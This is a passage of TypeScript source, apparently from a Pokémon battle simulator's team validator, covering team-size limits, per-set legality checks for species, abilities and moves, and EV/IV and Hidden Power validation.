				`This format doesn't let you use your own team.`,
				`If you're not using a custom client, please report this as a bug. If you are, remember to use \`/utm null\` before starting a game in this format.`,
			];
		}
		return null;
	}
	if (!team) {
		return [
			`This format requires you to use your own team.`,
			`If you're not using a custom client, please report this as a bug.`,
		];
	}

	if (!Array.isArray(team)) {
		throw new Error(`Invalid team data`);
	}

	// Team-size bounds come from the format, widened for doubles/triples.
	let [minSize, maxSize] = format.teamLength && format.teamLength.validate || [1, 6];
	if (format.gameType === 'doubles' && minSize < 2) minSize = 2;
	if (['triples', 'rotation'].includes(format.gameType as 'triples') && minSize < 3) minSize = 3;

	if (team.length < minSize) problems.push(`You must bring at least ${minSize} Pok\u00E9mon.`);
	if (team.length > maxSize) return [`You may only bring up to ${maxSize} Pok\u00E9mon.`];

	// A limit is imposed here to prevent too much engine strain or
	// too much layout deformation - to be exact, this is the limit
	// allowed in Custom Game.
	if (team.length > 24) {
		problems.push(`Your team has more than than 24 Pok\u00E9mon, which the simulator can't handle.`);
		return problems;
	}
	if (ruleTable.isBanned('nonexistent') && team.length > 6) {
		problems.push(`Your team has more than than 6 Pok\u00E9mon.`);
		return problems;
	}

	// Tally of rule keys across the team, consumed by complex team bans.
	const teamHas: {[k: string]: number} = {};
	let lgpeStarterCount = 0;
	let deoxysType;
	for (const set of team) {
		if (!set) return [`You sent invalid team data. If you're not using a custom client, please report this as a bug.`];

		let setProblems: string[] | null = null;
		// skipSets lets cached validations contribute their tallies without
		// re-running the full per-set validation.
		if (options.skipSets && options.skipSets[set.name]) {
			for (const i in options.skipSets[set.name]) {
				teamHas[i] = (teamHas[i] || 0) + 1;
			}
		} else {
			setProblems = (format.validateSet || this.validateSet).call(this, set, teamHas);
		}

		// Let's Go: only one partner starter per team.
		if (set.species === 'Pikachu-Starter' || set.species === 'Eevee-Starter') {
			lgpeStarterCount++;
			if (lgpeStarterCount === 2 && ruleTable.isBanned('nonexistent')) {
				problems.push(`You can only have one of Pikachu-Starter or Eevee-Starter on a team.`);
			}
		}
		// Gen 3 carts only support one Deoxys forme per game.
		if (dex.gen === 3 && set.species.startsWith('Deoxys')) {
			if (!deoxysType) {
				deoxysType = set.species;
			} else if (deoxysType !== set.species && ruleTable.isBanned('nonexistent')) {
				return [
					`You cannot have more than one type of Deoxys forme.`,
					`(Each game in Gen 3 supports only one forme of Deoxys.)`,
				];
			}
		}

		if (setProblems) {
			problems = problems.concat(setProblems);
		}
		if (options.removeNicknames) {
			const species = dex.getSpecies(set.species);
			let crossSpecies: Species;
			// Cross Evolution encodes the target species in the nickname.
			if (format.name === '[Gen 8] Cross Evolution' && (crossSpecies = dex.getSpecies(set.name)).exists) {
				set.name = crossSpecies.name;
			} else {
				set.name = species.baseSpecies;
				if (species.baseSpecies === 'Unown') set.species = 'Unown';
			}
		}
	}

	// Complex team bans: with a limit, count every copy; without one, the
	// ban triggers only when every listed element is present.
	for (const [rule, source, limit, bans] of ruleTable.complexTeamBans) {
		let count = 0;
		for (const ban of bans) {
			if (teamHas[ban] > 0) {
				count += limit ? teamHas[ban] : 1;
			}
		}
		if (limit && count > limit) {
			const clause = source ? ` by ${source}` : ``;
			problems.push(`You are limited to ${limit} of ${rule}${clause}.`);
		} else if (!limit && count >= bans.length) {
			const clause = source ? ` by ${source}` : ``;
			problems.push(`Your team has the combination of ${rule}, which is banned${clause}.`);
		}
	}

	// Run onValidateTeam hooks of every subformat rule, then the format's own.
	for (const rule of ruleTable.keys()) {
		if ('!+-'.includes(rule.charAt(0))) continue;
		const subformat = dex.getFormat(rule);
		if (subformat.onValidateTeam && ruleTable.has(subformat.id)) {
			problems = problems.concat(subformat.onValidateTeam.call(this, team, format, teamHas) || []);
		}
	}
	if (format.onValidateTeam) {
		problems = problems.concat(format.onValidateTeam.call(this, team, format, teamHas) || []);
	}

	if (!problems.length) return null;
	return problems;
}
/**
 * Validate a single set. Normalizes the set in place (species, item,
 * ability, nature, level, name), tallies rule keys into setHas/teamHas,
 * and runs species/item/ability/nature/move legality plus event-source
 * checks. Returns a list of human-readable problems, or null when legal.
 * Ordering of the sections below matters: later checks rely on the
 * normalization done by earlier ones.
 */
validateSet(set: PokemonSet, teamHas: AnyObject): string[] | null {
	const format = this.format;
	const dex = this.dex;
	const ruleTable = this.ruleTable;

	let problems: string[] = [];
	if (!set) {
		return [`This is not a Pokemon.`];
	}

	let species = dex.getSpecies(set.species);
	set.species = species.name;
	// Backwards compatability with old Gmax format
	if (set.species.toLowerCase().endsWith('-gmax') && this.format.id !== 'gen8megamax') {
		set.species = set.species.slice(0, -5);
		species = dex.getSpecies(set.species);
		if (set.name && set.name.endsWith('-Gmax')) set.name = species.baseSpecies;
		set.gigantamax = true;
	}
	if (set.name && set.name.length > 18) {
		if (set.name === set.species) {
			set.name = species.baseSpecies;
		} else {
			problems.push(`Nickname "${set.name}" too long (should be 18 characters or fewer)`);
		}
	}
	set.name = dex.getName(set.name);
	let item = dex.getItem(Utils.getString(set.item));
	set.item = item.name;
	let ability = dex.getAbility(Utils.getString(set.ability));
	set.ability = ability.name;
	let nature = dex.getNature(Utils.getString(set.nature));
	set.nature = nature.name;
	if (!Array.isArray(set.moves)) set.moves = [];

	// Level normalization; forcedLevel is restored at the very end.
	const maxLevel = format.maxLevel || 100;
	const maxForcedLevel = format.maxForcedLevel || maxLevel;
	let forcedLevel: number | null = null;
	if (!set.level) {
		set.level = (format.defaultLevel || maxLevel);
	}
	if (format.forcedLevel) {
		forcedLevel = format.forcedLevel;
	} else if (set.level >= maxForcedLevel) {
		forcedLevel = maxForcedLevel;
	}
	if (set.level > maxLevel || set.level === forcedLevel || set.level === maxForcedLevel) {
		// Note that we're temporarily setting level 50 pokemon in VGC to level 100
		// This allows e.g. level 50 Hydreigon even though it doesn't evolve until level 64.
		// Leveling up can't make an obtainable pokemon unobtainable, so this is safe.
		// Just remember to set the level back to forcedLevel at the end of the file.
		set.level = maxLevel;
	}
	// NOTE(review): this also fires for level < 1, but the message only
	// mentions "higher than level 100" — confirm intended wording.
	if ((set.level > 100 || set.level < 1) && ruleTable.isBanned('nonexistent')) {
		problems.push((set.name || set.species) + ' is higher than level 100.');
	}

	set.name = set.name || species.baseSpecies;
	let name = set.species;
	if (set.species !== set.name && species.baseSpecies !== set.name) {
		name = `${set.name} (${set.species})`;
	}

	const setHas: {[k: string]: true} = {};

	const allowEVs = dex.currentMod !== 'letsgo';
	const capEVs = dex.gen > 2 && (ruleTable.has('obtainablemisc') || dex.gen === 6);
	if (!set.evs) set.evs = TeamValidator.fillStats(null, allowEVs && !capEVs ? 252 : 0);
	if (!set.ivs) set.ivs = TeamValidator.fillStats(null, 31);

	if (ruleTable.has('obtainableformes')) {
		problems.push(...this.validateForme(set));
		species = dex.getSpecies(set.species);
	}
	const setSources = this.allSources(species);

	// onChangeSet hooks of subformat rules, then of the format itself.
	for (const [rule] of ruleTable) {
		if ('!+-'.includes(rule.charAt(0))) continue;
		const subformat = dex.getFormat(rule);
		if (subformat.onChangeSet && ruleTable.has(subformat.id)) {
			problems = problems.concat(subformat.onChangeSet.call(this, set, format, setHas, teamHas) || []);
		}
	}
	if (format.onChangeSet) {
		problems = problems.concat(format.onChangeSet.call(this, set, format, setHas, teamHas) || []);
	}

	// onChangeSet can modify set.species, set.item, set.ability
	species = dex.getSpecies(set.species);
	item = dex.getItem(set.item);
	ability = dex.getAbility(set.ability);

	// outOfBattleSpecies: forme used for learnset/event checks;
	// tierSpecies: forme used for banlist/tier checks.
	let outOfBattleSpecies = species;
	let tierSpecies = species;
	if (ability.id === 'battlebond' && species.id === 'greninja') {
		outOfBattleSpecies = dex.getSpecies('greninjaash');
		if (ruleTable.has('obtainableformes')) {
			tierSpecies = outOfBattleSpecies;
		}
		if (ruleTable.has('obtainablemisc')) {
			if (set.gender && set.gender !== 'M') {
				problems.push(`Battle Bond Greninja must be male.`);
			}
			set.gender = 'M';
		}
	}

	if (ability.id === 'owntempo' && species.id === 'rockruff') {
		tierSpecies = outOfBattleSpecies = dex.getSpecies('rockruffdusk');
	}

	// Gmax Melmetal exists only as a specific event Pokemon.
	if (species.id === 'melmetal' && set.gigantamax && this.dex.getLearnsetData(species.id).eventData) {
		setSources.sourcesBefore = 0;
		setSources.sources = ['8S0 melmetal'];
	}

	if (!species.exists) {
		return [`The Pokemon "${set.species}" does not exist.`];
	}

	if (item.id && !item.exists) {
		return [`"${set.item}" is an invalid item.`];
	}
	if (ability.id && !ability.exists) {
		if (dex.gen < 3) {
			// gen 1-2 don't have abilities, just silently remove
			ability = dex.getAbility('');
			set.ability = '';
		} else {
			return [`"${set.ability}" is an invalid ability.`];
		}
	}
	if (nature.id && !nature.exists) {
		if (dex.gen < 3) {
			// gen 1-2 don't have natures, just remove them
			nature = dex.getNature('');
			set.nature = '';
		} else {
			problems.push(`"${set.nature}" is an invalid nature.`);
		}
	}
	if (set.happiness !== undefined && isNaN(set.happiness)) {
		problems.push(`${name} has an invalid happiness value.`);
	}
	if (set.hpType) {
		const type = dex.getType(set.hpType);
		if (!type.exists || ['normal', 'fairy'].includes(type.id)) {
			problems.push(`${name}'s Hidden Power type (${set.hpType}) is invalid.`);
		} else {
			set.hpType = type.name;
		}
	}

	// Resolve the tier-relevant forme (mega/primal) for banlist purposes.
	if (ruleTable.has('obtainableformes')) {
		const canMegaEvo = dex.gen <= 7 || ruleTable.has('standardnatdex');
		if (item.megaEvolves === species.name) {
			if (!item.megaStone) throw new Error(`Item ${item.name} has no base form for mega evolution`);
			tierSpecies = dex.getSpecies(item.megaStone);
		} else if (item.id === 'redorb' && species.id === 'groudon') {
			tierSpecies = dex.getSpecies('Groudon-Primal');
		} else if (item.id === 'blueorb' && species.id === 'kyogre') {
			tierSpecies = dex.getSpecies('Kyogre-Primal');
		// NOTE(review): Adamant Orb -> Dialga-Primal looks fork-specific;
		// mainline Showdown has no such forme — confirm this is intended.
		} else if (item.id === 'adamantorb' && species.id === 'dialga') {
			tierSpecies = dex.getSpecies('Dialga-Primal');
		} else if (canMegaEvo && species.id === 'rayquaza' && set.moves.map(toID).includes('dragonascent' as ID)) {
			tierSpecies = dex.getSpecies('Rayquaza-Mega');
		}
	}

	let problem = this.checkSpecies(set, species, tierSpecies, setHas);
	if (problem) problems.push(problem);

	problem = this.checkItem(set, item, setHas);
	if (problem) problems.push(problem);
	if (ruleTable.has('obtainablemisc')) {
		if (dex.gen <= 1 || ruleTable.has('allowavs')) {
			if (item.id) {
				// no items allowed
				set.item = '';
			}
		}
	}

	if (!set.ability) set.ability = 'No Ability';
	// Ability legality: must be one of the species' abilities; Hidden
	// Abilities carry extra release/gender/source restrictions.
	if (ruleTable.has('obtainableabilities')) {
		if (dex.gen <= 2 || dex.currentMod === 'letsgo') {
			set.ability = 'No Ability';
		} else {
			if (!ability.name || ability.name === 'No Ability') {
				problems.push(`${name} needs to have an ability.`);
			} else if (!Object.values(species.abilities).includes(ability.name)) {
				if (tierSpecies.abilities[0] === ability.name) {
					set.ability = species.abilities[0];
				} else {
					problems.push(`${name} can't have ${set.ability}.`);
				}
			}
			if (ability.name === species.abilities['H']) {
				setSources.isHidden = true;

				let unreleasedHidden = species.unreleasedHidden;
				if (unreleasedHidden === 'Past' && this.minSourceGen < dex.gen) unreleasedHidden = false;

				if (unreleasedHidden && ruleTable.has('-unreleased')) {
					problems.push(`${name}'s Hidden Ability is unreleased.`);
				} else if (dex.gen === 7 && ['entei', 'suicune', 'raikou'].includes(species.id) && this.minSourceGen > 1) {
					problems.push(`${name}'s Hidden Ability is only available from Virtual Console, which is not allowed in this format.`);
				} else if (dex.gen === 6 && ability.name === 'Symbiosis' &&
					(set.species.endsWith('Orange') || set.species.endsWith('White'))) {
					problems.push(`${name}'s Hidden Ability is unreleased for the Orange and White forms.`);
				} else if (dex.gen === 5 && set.level < 10 && (species.maleOnlyHidden || species.gender === 'N')) {
					problems.push(`${name} must be at least level 10 to have a Hidden Ability.`);
				}
				if (species.maleOnlyHidden) {
					if (set.gender && set.gender !== 'M') {
						problems.push(`${name} must be male to have a Hidden Ability.`);
					}
					set.gender = 'M';
					setSources.sources = ['5D'];
				}
			} else {
				setSources.isHidden = false;
			}
		}
	}

	ability = dex.getAbility(set.ability);
	problem = this.checkAbility(set, ability, setHas);
	if (problem) problems.push(problem);

	if (!set.nature || dex.gen <= 2) {
		set.nature = '';
	}
	nature = dex.getNature(set.nature);
	problem = this.checkNature(set, nature, setHas);
	if (problem) problems.push(problem);

	if (set.moves && Array.isArray(set.moves)) {
		set.moves = set.moves.filter(val => val);
	}
	if (!set.moves?.length) {
		problems.push(`${name} has no moves.`);
		set.moves = [];
	}
	// A limit is imposed here to prevent too much engine strain or
	// too much layout deformation - to be exact, this is the limit
	// allowed in Custom Game.
	if (set.moves.length > 24) {
		problems.push(`${name} has more than 24 moves, which the simulator can't handle.`);
		return problems;
	}
	if (ruleTable.isBanned('nonexistent') && set.moves.length > 4) {
		problems.push(`${name} has more than 4 moves.`);
		return problems;
	}

	if (ruleTable.isBanned('nonexistent')) {
		problems.push(...this.validateStats(set, species, setSources));
	}

	// Per-move existence and ban checks; learnset legality comes next.
	for (const moveName of set.moves) {
		if (!moveName) continue;
		const move = dex.getMove(Utils.getString(moveName));
		if (!move.exists) return [`"${move.name}" is an invalid move.`];

		problem = this.checkMove(set, move, setHas);
		if (problem) problems.push(problem);
	}

	if (ruleTable.has('obtainablemoves')) {
		problems.push(...this.validateMoves(outOfBattleSpecies, set.moves, setSources, set, name));
	}

	const learnsetSpecies = dex.getLearnsetData(outOfBattleSpecies.id);

	// If only specific sources remain, at least one must check out; report
	// the most useful failure (egg-move combination vs event mismatch).
	if (!setSources.sourcesBefore && setSources.sources.length) {
		let legal = false;
		for (const source of setSources.sources) {
			if (this.validateSource(set, source, setSources, outOfBattleSpecies)) continue;
			legal = true;
			break;
		}

		if (!legal) {
			let nonEggSource = null;
			for (const source of setSources.sources) {
				if (source.charAt(1) !== 'E') {
					nonEggSource = source;
					break;
				}
			}
			if (!nonEggSource) {
				// all egg moves
				problems.push(`${name} can't get its egg move combination (${setSources.limitedEggMoves!.join(', ')}) from any possible father.`);
				problems.push(`(Is this incorrect? If so, post the chainbreeding instructions in Bug Reports)`);
			} else {
				if (setSources.sources.length > 1) {
					problems.push(`${name} has an event-exclusive move that it doesn't qualify for (only one of several ways to get the move will be listed):`);
				}
				const eventProblems = this.validateSource(
					set, nonEggSource, setSources, outOfBattleSpecies, ` because it has a move only available`
				);
				if (eventProblems) problems.push(...eventProblems);
			}
		}
	} else if (ruleTable.has('obtainablemisc') && learnsetSpecies.eventOnly) {
		// Event-only species must match one of their event definitions.
		const eventSpecies = !learnsetSpecies.eventData &&
			outOfBattleSpecies.baseSpecies !== outOfBattleSpecies.name ?
			dex.getSpecies(outOfBattleSpecies.baseSpecies) : outOfBattleSpecies;
		const eventData = learnsetSpecies.eventData ||
			dex.getLearnsetData(eventSpecies.id).eventData;
		if (!eventData) throw new Error(`Event-only species ${species.name} has no eventData table`);
		let legal = false;
		for (const event of eventData) {
			if (this.validateEvent(set, event, eventSpecies)) continue;
			legal = true;
			break;
		}
		if (!legal && species.gen <= 2 && dex.gen >= 7 && !this.validateSource(set, '7V', setSources, species)) {
			legal = true;
		}
		if (!legal) {
			if (eventData.length === 1) {
				problems.push(`${species.name} is only obtainable from an event - it needs to match its event:`);
			} else {
				problems.push(`${species.name} is only obtainable from events - it needs to match one of its events, such as:`);
			}
			let eventInfo = eventData[0];
			let eventNum = 1;
			for (const [i, event] of eventData.entries()) {
				if (event.generation <= dex.gen && event.generation >= this.minSourceGen) {
					eventInfo = event;
					eventNum = i + 1;
					break;
				}
			}
			const eventName = eventData.length > 1 ? ` #${eventNum}` : ``;
			const eventProblems = this.validateEvent(set, eventInfo, eventSpecies, ` to be`, `from its event${eventName}`);
			if (eventProblems) problems.push(...eventProblems);
		}
	}
	if (ruleTable.has('obtainablemisc') && set.level < (species.evoLevel || 0)) {
		// FIXME: Event pokemon given at a level under what it normally can be attained at gives a false positive
		problems.push(`${name} must be at least level ${species.evoLevel} to be evolved.`);
	}
	if (ruleTable.has('obtainablemoves') && species.id === 'keldeo' && set.moves.includes('secretsword') &&
		this.minSourceGen > 5 && dex.gen <= 7) {
		problems.push(`${name} has Secret Sword, which is only compatible with Keldeo-Ordinary obtained from Gen 5.`);
	}
	const requiresGen3Source = setSources.maxSourceGen() <= 3;
	if (requiresGen3Source && dex.getAbility(set.ability).gen === 4 && !species.prevo && dex.gen <= 5) {
		// Ability Capsule allows this in Gen 6+
		problems.push(`${name} has a Gen 4 ability and isn't evolved - it can't use moves from Gen 3.`);
	}
	const canUseAbilityPatch = dex.gen >= 8 && format.mod !== 'gen8dlc1';
	if (setSources.isHidden && !canUseAbilityPatch && setSources.maxSourceGen() < 5) {
		problems.push(`${name} has a Hidden Ability - it can't use moves from before Gen 5.`);
	}
	if (
		species.maleOnlyHidden && setSources.isHidden && setSources.sourcesBefore < 5 &&
		setSources.sources.every(source => source.charAt(1) === 'E')
	) {
		problems.push(`${name} has an unbreedable Hidden Ability - it can't use egg moves.`);
	}

	// Fold this set's rule-key tallies into the team-level tally.
	if (teamHas) {
		for (const i in setHas) {
			if (i in teamHas) {
				teamHas[i]++;
			} else {
				teamHas[i] = 1;
			}
		}
	}
	// Complex bans on a single set (e.g. banned ability+move combinations).
	for (const [rule, source, limit, bans] of ruleTable.complexBans) {
		let count = 0;
		for (const ban of bans) {
			if (setHas[ban]) count++;
		}
		if (limit && count > limit) {
			const clause = source ? ` by ${source}` : ``;
			problems.push(`${name} is limited to ${limit} of ${rule}${clause}.`);
		} else if (!limit && count >= bans.length) {
			const clause = source ? ` by ${source}` : ``;
			if (source === 'Obtainable Moves') {
				problems.push(`${name} has the combination of ${rule}, which is impossible to obtain legitimately.`);
			} else {
				problems.push(`${name} has the combination of ${rule}, which is banned${clause}.`);
			}
		}
	}

	// onValidateSet hooks of subformat rules, then of the format itself.
	for (const [rule] of ruleTable) {
		if ('!+-'.includes(rule.charAt(0))) continue;
		const subformat = dex.getFormat(rule);
		if (subformat.onValidateSet && ruleTable.has(subformat.id)) {
			problems = problems.concat(subformat.onValidateSet.call(this, set, format, setHas, teamHas) || []);
		}
	}
	if (format.onValidateSet) {
		problems = problems.concat(format.onValidateSet.call(this, set, format, setHas, teamHas) || []);
	}

	// Nickname Clause: a nickname may not be a different species' name.
	const nameSpecies = dex.getSpecies(set.name);
	if (nameSpecies.exists && nameSpecies.name.toLowerCase() === set.name.toLowerCase()) {
		// nickname is the name of a species
		if (nameSpecies.baseSpecies === species.baseSpecies) {
			set.name = species.baseSpecies;
		} else if (nameSpecies.name !== species.name && nameSpecies.name !== species.baseSpecies) {
			// nickname species doesn't match actual species
			// Nickname Clause
			problems.push(`${name} must not be nicknamed a different Pokémon species than what it actually is.`);
		}
	}

	if (!problems.length) {
		// Restore the level we temporarily raised near the top of this method.
		if (forcedLevel) set.level = forcedLevel;
		return null;
	}

	return problems;
}
	/**
	 * Validates a set's EVs and IVs (DVs in Gens 1-2) plus stat-derived
	 * legality: Hidden Power type consistency, legendary perfect-IV
	 * requirements, Gen 1-2 DV-derived gender/shininess, and EV totals.
	 *
	 * Mutates `set`: fills in missing `evs`/`ivs`, may infer `set.hpType`
	 * from a Hidden Power move, may rewrite IVs/DVs to match a requested
	 * Hidden Power type, may set `set.gender` from the Atk DV (Gen 2), and
	 * forces `set.nature = 'Serious'` in Gens 1-2.
	 *
	 * Returns an array of problem messages (empty when the stats are legal).
	 */
	validateStats(set: PokemonSet, species: Species, setSources: PokemonSources) {
		const ruleTable = this.ruleTable;
		const dex = this.dex;
		// Let's Go replaces EVs with Awakening Values (AVs).
		const allowEVs = dex.currentMod !== 'letsgo';
		const allowAVs = ruleTable.has('allowavs');
		// EVs are capped in Gen 3+ when Obtainable Misc applies; Gen 6 caps them regardless.
		const capEVs = dex.gen > 2 && (ruleTable.has('obtainablemisc') || dex.gen === 6);
		// Hyper Training (Bottle Caps): Gen 7+, normally only at level 100.
		const canBottleCap = dex.gen >= 7 && (set.level === 100 || !ruleTable.has('obtainablemisc'));
		// Default EVs are maxed when uncapped, zero otherwise; default IVs are 31.
		if (!set.evs) set.evs = TeamValidator.fillStats(null, allowEVs && !capEVs ? 252 : 0);
		if (!set.ivs) set.ivs = TeamValidator.fillStats(null, 31);
		const problems = [];
		const name = set.name || set.species;
		// Display names for stat keys, used in problem messages.
		const statTable = {
			hp: 'HP', atk: 'Attack', def: 'Defense', spa: 'Special Attack', spd: 'Special Defense', spe: 'Speed',
		};
		const maxedIVs = Object.values(set.ivs).every(stat => stat === 31);
		// Infer the Hidden Power type from a Hidden Power move; a conflicting
		// explicit hpType is only a problem when Obtainable Misc applies.
		for (const moveName of set.moves) {
			const move = dex.getMove(moveName);
			if (move.id === 'hiddenpower' && move.type !== 'Normal') {
				if (!set.hpType) {
					set.hpType = move.type;
				} else if (set.hpType !== move.type && ruleTable.has('obtainablemisc')) {
					problems.push(`${name}'s Hidden Power type ${set.hpType} is incompatible with Hidden Power ${move.type}`);
				}
			}
		}
		// If a Hidden Power type was requested but IVs were left at the
		// default 31s, quietly adjust the IVs to produce that type.
		if (set.hpType && maxedIVs && ruleTable.has('obtainablemisc')) {
			if (dex.gen <= 2) {
				// Gens 1-2 use DVs (0-15); store them here on the IV scale (x2).
				const HPdvs = dex.getType(set.hpType).HPdvs;
				set.ivs = {hp: 30, atk: 30, def: 30, spa: 30, spd: 30, spe: 30};
				let statName: StatName;
				for (statName in HPdvs) {
					set.ivs[statName] = HPdvs[statName]! * 2;
				}
				// Sentinel: the HP DV is recomputed from the other DVs below.
				set.ivs.hp = -1;
			} else if (!canBottleCap) {
				set.ivs = TeamValidator.fillStats(dex.getType(set.hpType).HPivs, 31);
			}
		}
		// Pokemon that can neither breed nor evolve (minus special-cased fossils
		// etc.) are treated as legendaries for the 3-perfect-IV guarantee.
		const cantBreedNorEvolve = (species.eggGroups[0] === 'Undiscovered' && !species.prevo && !species.nfe);
		const isLegendary = (cantBreedNorEvolve && ![
			'Pikachu', 'Unown', 'Dracozolt', 'Arctozolt', 'Dracovish', 'Arctovish',
		].includes(species.baseSpecies)) || [
			'Manaphy', 'Cosmog', 'Cosmoem', 'Solgaleo', 'Lunala',
		].includes(species.baseSpecies);
		// Non-shiny Diancie is exempt from the 3-perfect-IV requirement.
		const diancieException = species.name === 'Diancie' && !set.shiny;
		const has3PerfectIVs = setSources.minSourceGen() >= 6 && isLegendary && !diancieException;
		if (has3PerfectIVs) {
			let perfectIVs = 0;
			for (const stat in set.ivs) {
				if (set.ivs[stat as 'hp'] >= 31) perfectIVs++;
			}
			if (perfectIVs < 3) {
				const reason = (this.minSourceGen === 6 ? ` and this format requires gen ${dex.gen} Pokémon` : ` in gen 6 or later`);
				problems.push(`${name} must have at least three perfect IVs because it's a legendary${reason}.`);
			}
		}
		// Without Hyper Training, the IVs must literally produce the declared
		// Hidden Power type; with it, the IVs only need to allow the type.
		if (set.hpType && !canBottleCap) {
			const ivHpType = dex.getHiddenPower(set.ivs).type;
			if (set.hpType !== ivHpType) {
				problems.push(`${name} has Hidden Power ${set.hpType}, but its IVs are for Hidden Power ${ivHpType}.`);
			}
		} else if (set.hpType) {
			if (!this.possibleBottleCapHpType(set.hpType, set.ivs)) {
				problems.push(`${name} has Hidden Power ${set.hpType}, but its IVs don't allow this even with (Bottle Cap) Hyper Training.`);
			}
		}
		if (dex.gen <= 2) {
			// validate DVs
			const ivs = set.ivs;
			const atkDV = Math.floor(ivs.atk / 2);
			const defDV = Math.floor(ivs.def / 2);
			const speDV = Math.floor(ivs.spe / 2);
			const spcDV = Math.floor(ivs.spa / 2);
			// The HP DV is not independent: it's built from the low bit of each other DV.
			const expectedHpDV = (atkDV % 2) * 8 + (defDV % 2) * 4 + (speDV % 2) * 2 + (spcDV % 2);
			// -1 is the sentinel set above: fill in the derived HP DV.
			if (ivs.hp === -1) ivs.hp = expectedHpDV * 2;
			const hpDV = Math.floor(ivs.hp / 2);
			if (expectedHpDV !== hpDV) {
				problems.push(`${name} has an HP DV of ${hpDV}, but its Atk, Def, Spe, and Spc DVs give it an HP DV of ${expectedHpDV}.`);
			}
			// Gen 2 has a single Special DV; in Gen 1 the two are silently merged.
			if (ivs.spa !== ivs.spd) {
				if (dex.gen === 2) {
					problems.push(`${name} has different SpA and SpD DVs, which is not possible in Gen 2.`);
				} else {
					ivs.spd = ivs.spa;
				}
			}
			if (dex.gen > 1 && !species.gender) {
				// Gen 2 gender is calculated from the Atk DV.
				// High Atk DV <-> M. The meaning of "high" depends on the gender ratio.
				const genderThreshold = species.genderRatio.F * 16;
				const expectedGender = (atkDV >= genderThreshold ? 'M' : 'F');
				if (set.gender && set.gender !== expectedGender) {
					problems.push(`${name} is ${set.gender}, but it has an Atk DV of ${atkDV}, which makes its gender ${expectedGender}.`);
				} else {
					set.gender = expectedGender;
				}
			}
			if (
				set.species === 'Marowak' && toID(set.item) === 'thickclub' &&
				set.moves.map(toID).includes('swordsdance' as ID) && set.level === 100
			) {
				// Marowak hack
				set.ivs.atk = Math.floor(set.ivs.atk / 2) * 2;
				// Reduce Atk EVs until the computed Attack value fits within 255.
				while (set.evs.atk > 0 && 2 * 80 + set.ivs.atk + Math.floor(set.evs.atk / 4) + 5 > 255) {
					set.evs.atk -= 4;
				}
			}
			if (dex.gen > 1) {
				// Gen 2 shininess is fully determined by the DVs.
				const expectedShiny = !!(defDV === 10 && speDV === 10 && spcDV === 10 && atkDV % 4 >= 2);
				if (expectedShiny && !set.shiny) {
					problems.push(`${name} is not shiny, which does not match its DVs.`);
				} else if (!expectedShiny && set.shiny) {
					problems.push(`${name} is shiny, which does not match its DVs (its DVs must all be 10, except Atk which must be 2, 3, 6, 7, 10, 11, 14, or 15).`);
				}
			}
			// Natures don't exist before Gen 3; normalize to the neutral one.
			set.nature = 'Serious';
		}
		for (const stat in set.evs) {
			if (set.evs[stat as 'hp'] < 0) {
				problems.push(`${name} has less than 0 ${allowAVs ? 'Awakening Values' : 'EVs'} in ${statTable[stat as 'hp']}.`);
			}
		}
		if (dex.currentMod === 'letsgo') { // AVs
			for (const stat in set.evs) {
				if (set.evs[stat as 'hp'] > 0 && !allowAVs) {
					problems.push(`${name} has Awakening Values but this format doesn't allow them.`);
					break;
				} else if (set.evs[stat as 'hp'] > 200) {
					problems.push(`${name} has more than 200 Awakening Values in ${statTable[stat as 'hp']}.`);
				}
			}
		} else { // EVs
			for (const stat in set.evs) {
				if (set.evs[stat as StatName] > 255) {
					problems.push(`${name} has more than 255 EVs in ${statTable[stat as 'hp']}.`);
				}
			}
			if (dex.gen <= 2) {
				// Special is one stat pre-Gen 3; mirror SpA EVs into SpD in Gen 1.
				if (set.evs.spa !== set.evs.spd) {
					if (dex.gen === 2) {
						problems.push(`${name} has different SpA and SpD EVs, which is not possible in Gen 2.`);
					} else {
						set.evs.spd = set.evs.spa;
					}
				}
			}
		}
		let totalEV = 0;
		for (const stat in set.evs) totalEV += set.evs[stat as 'hp'];
		// Heuristic warnings for likely import mistakes; suppressed in debug formats.
		if (!this.format.debug) {
			if (set.level > 1 && (allowEVs || allowAVs) && totalEV === 0) {
				problems.push(`${name} has exactly 0 EVs - did you forget to EV it? (If this was intentional, add exactly 1 to one of your EVs, which won't change its stats but will tell us that it wasn't a mistake).`);
			} else if (allowEVs && !capEVs && [508, 510].includes(totalEV)) {
				problems.push(`${name} has exactly 510 EVs, but this format does not restrict you to 510 EVs: you can max out every EV (If this was intentional, add exactly 1 to one of your EVs, which won't change its stats but will tell us that it wasn't a mistake).`);
			}
			// Check for level import errors from user in VGC -> DOU, etc.
			// Note that in VGC etc (maxForcedLevel: 50), `set.level` will be 100 here for validation purposes
			if (set.level === 50 && this.format.maxLevel !== 50 && allowEVs && totalEV % 4 === 0) {
				problems.push(`${name} is level 50, but this format allows level 100 Pokémon. (If this was intentional, add exactly 1 to one of your EVs, which won't change its stats but will tell us that it wasn't a mistake).`);
			}
		}
		if (allowEVs && capEVs && totalEV > 510) {
			problems.push(`${name} has more than 510 total EVs.`);
		}
		return problems;
	}
/**
* Not exhaustive, just checks Atk and Spe, which are the only competitively
* relevant IVs outside of extremely obscure situations.
*/
possibleBottleCapHpType(type: string, ivs: StatsTable) {
if (!type) return true;
if (['Dark', 'Dragon', 'Grass', 'Ghost', 'Poison'].includes(type)) {
// Spe must be odd
if (ivs.spe % 2 === 0) return false;
}
if (['Psychic', 'Fire', 'Rock', 'Fighting'].includes(type)) {
// Spe must be even
if (ivs.spe !== 31 && ivs.spe % 2 === 1) return false;
}
if (type === 'Dark') {
// Atk must be odd
if (ivs.atk % 2 === 0) return false;
}
if (['Ice', 'Water'].includes(type)) {
// Spe or Atk must be odd
if (ivs.spe % 2 === 0 && ivs.atk % 2 === 0) return false;
}
return true;
}
	validateSource(
		set: PokemonSet, source: PokemonSource, setSources: PokemonSources, species: Species, because: string
	): string[] | undefined;
	validateSource(
		set: PokemonSet, source: PokemonSource, setSources: PokemonSources, species: Species
	): true | undefined;
	/**
	 * Returns array of error messages if invalid, undefined if valid
	 *
	 * If `because` is not passed, instead returns true if invalid.
	 *
	 * The source ID's first character is its generation; the character(s)
	 * after it select the branch below: 'S' = a specific event, '7V'/'8V' =
	 * Virtual Console / Let's Go HOME transfers, 'D' = Dream World, 'E' =
	 * bred egg moves. Anything else is a programming error and throws.
	 */
	validateSource(
		set: PokemonSet, source: PokemonSource, setSources: PokemonSources, species: Species, because?: string
	) {
		let eventData: EventInfo | undefined;
		let eventSpecies = species;
		if (source.charAt(1) === 'S') {
			// Event source: after the "S" (and optional "T") come the event
			// index and the species the event distributed, space-separated.
